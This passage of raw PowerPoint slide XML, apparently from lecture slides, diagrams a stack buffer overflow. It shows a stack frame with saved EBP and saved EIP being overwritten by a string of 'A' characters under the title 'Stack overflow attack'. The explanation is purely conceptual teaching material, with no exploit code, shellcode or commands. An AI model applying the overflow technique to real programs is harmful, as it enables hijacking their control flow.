      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180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8580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2F2FB72-D514-2143-A5CE-946DF4147B6A}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50181" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50187" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="29718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8" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50189" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50190" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50191" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="2590800"/>
              <a:ext cx="29718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top of stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50192" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="2362200"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50193" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50194" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50195" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="38100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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50196" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50197" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50198" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="2819400"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50199" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3581400"/>
              <a:ext cx="8382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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50200" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="30480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1" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="38100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2" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50203" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50204" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3048000"/>
              <a:ext cx="2971800" cy="762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local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50182" name="Right Arrow 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3733800"/>
            <a:ext cx="3048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4267200" y="2514600"/>
            <a:ext cx="137160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push EBP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allocate a new frame for local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5880100" y="3546475"/>
            <a:ext cx="2438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</a:rPr>
              <a:t>          AAAAAAAAAAA</a:t>
            </a:r>
          </a:p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</a:rPr>
              <a:t>AAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4191000"/>
            <a:ext cx="1143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</a:rPr>
              <a:t>A A A A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4538663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</a:rPr>
              <a:t>A A A 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7" grpId="0"/>
      <p:bldP spid="28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Stack overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52226" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228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8580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6A3DD89-14AA-FE43-92F8-0E8CEEAA3D1C}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52229" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52234" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="29718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5" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52236" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52237" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52238" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="2590800"/>
              <a:ext cx="29718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top of stack</a:t>
              </a:r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7562800" y="2362200"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52240" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52241" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52242" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="38100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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52243" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52244" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52245" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="2819400"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52246" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3581400"/>
              <a:ext cx="8382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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52247" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="30480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8" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="38100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9" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52250" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52251" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3048000"/>
              <a:ext cx="2971800" cy="762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local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52230" name="Right Arrow 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4572000"/>
            <a:ext cx="3048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1" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5880100" y="3546475"/>
            <a:ext cx="2438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</a:rPr>
              <a:t>          AAAAAAAAAAA</a:t>
            </a:r>
          </a:p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</a:rPr>
              <a:t>AAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52232" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4191000"/>
            <a:ext cx="1143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</a:rPr>
              <a:t>A A A A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52233" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4538663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</a:rPr>
              <a:t>A A A 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Stack overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54274" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28681" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="5629275"/>
            <a:ext cx="20574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release the function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s frame and restore the saved EBP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54277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8580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09725BF-1C63-F444-A5A3-A96A99BE2D1B}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54278" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54287" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="29718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8" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54289" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54290" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54291" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54292" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54293" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3810000"/>
              <a:ext cx="2971800" cy="439681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFB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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54294" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54295" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54296" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3966029"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54297" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="4194629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8" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54299" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="29718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environment var</a:t>
              </a:r>
